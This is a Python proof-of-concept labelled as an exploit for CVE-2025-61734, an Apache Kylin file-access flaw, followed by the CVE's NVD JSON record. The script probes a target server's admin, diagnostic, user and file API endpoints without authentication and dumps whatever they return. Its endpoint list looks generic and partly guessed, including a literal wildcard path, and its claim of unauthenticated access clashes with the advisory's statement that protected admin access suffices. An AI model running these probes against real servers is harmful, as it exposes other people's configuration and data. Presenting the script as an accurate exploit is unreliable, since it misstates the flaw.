CVE-2025-61734

# CVE-2025-61734 - Apache Kylin File/Directory Access Vulnerability PoC # This PoC demonstrates how an unauthenticated attacker can access # restricted files or directories through vulnerable API endpoints import requests import sys TARGET_HOST = "http://target-kylin-server:7070" def exploit_file_access(endpoint_path): """ Attempt to access restricted files/directories via vulnerable API endpoint """ url = f"{TARGET_HOST}{endpoint_path}" headers = { "User-Agent": "Mozilla/5.0 (compatible; SecurityResearch/1.0)", "Accept": "application/json, text/plain, */*" } try: # Send unauthenticated request to vulnerable endpoint response = requests.get(url, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] Successfully accessed: {endpoint_path}") print(f"[+] Response status: {response.status_code}") print(f"[+] Response body (first 500 chars):") print(response.text[:500]) return response.text else: print(f"[-] Access denied or endpoint not found: {endpoint_path}") print(f"[-] Status code: {response.status_code}") return None except requests.exceptions.RequestException as e: print(f"[!] Error connecting to {url}: {e}") return None def main(): # Common vulnerable endpoints in Apache Kylin vulnerable_endpoints = [ "/kylin/api/admin/config", # Admin configuration "/kylin/api/diag", # Diagnostic information "/kylin/api/files/**", # File access "/kylin/api/projects", # Project listing "/kylin/api/user", # User information "/kylin/api/resource/path", # Resource path access "/kylin/api/tables", # Table metadata ] print("=" * 60) print("CVE-2025-61734 - Apache Kylin File Access PoC") print("=" * 60) print(f"[*] Target: {TARGET_HOST}") print() for endpoint in vulnerable_endpoints: print(f"[*] Probing endpoint: {endpoint}") result = exploit_file_access(endpoint) if result: print(f"[+] Sensitive data potentially exposed!") print() if __name__ == "__main__": if len(sys.argv) > 1: TARGET_HOST = sys.argv[1] main()

{"cve": {"id": "CVE-2025-61734", "sourceIdentifier": "[email protected]", "published": "2025-10-02T10:15:40.100", "lastModified": "2025-11-04T22:16:36.973", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Files or Directories Accessible to External Parties vulnerability in Apache Kylin.\n You are fine as long as the Kylin's system and project admin access is well protected.\n\nThis issue affects Apache Kylin: from 4.0.0 through 5.0.2.\n\nUsers are recommended to upgrade to version 5.0.3, which fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-552"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:kylin:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "5.0.3", "matchCriteriaId": "0732C89B-68F0-406A-977F-C75F554B17DD"}]}]}], "references": [{"url": "https://lists.apache.org/thread/z705g7sn3g0bkchlqbo1hz1tyqorn4d2", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/09/30/8", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}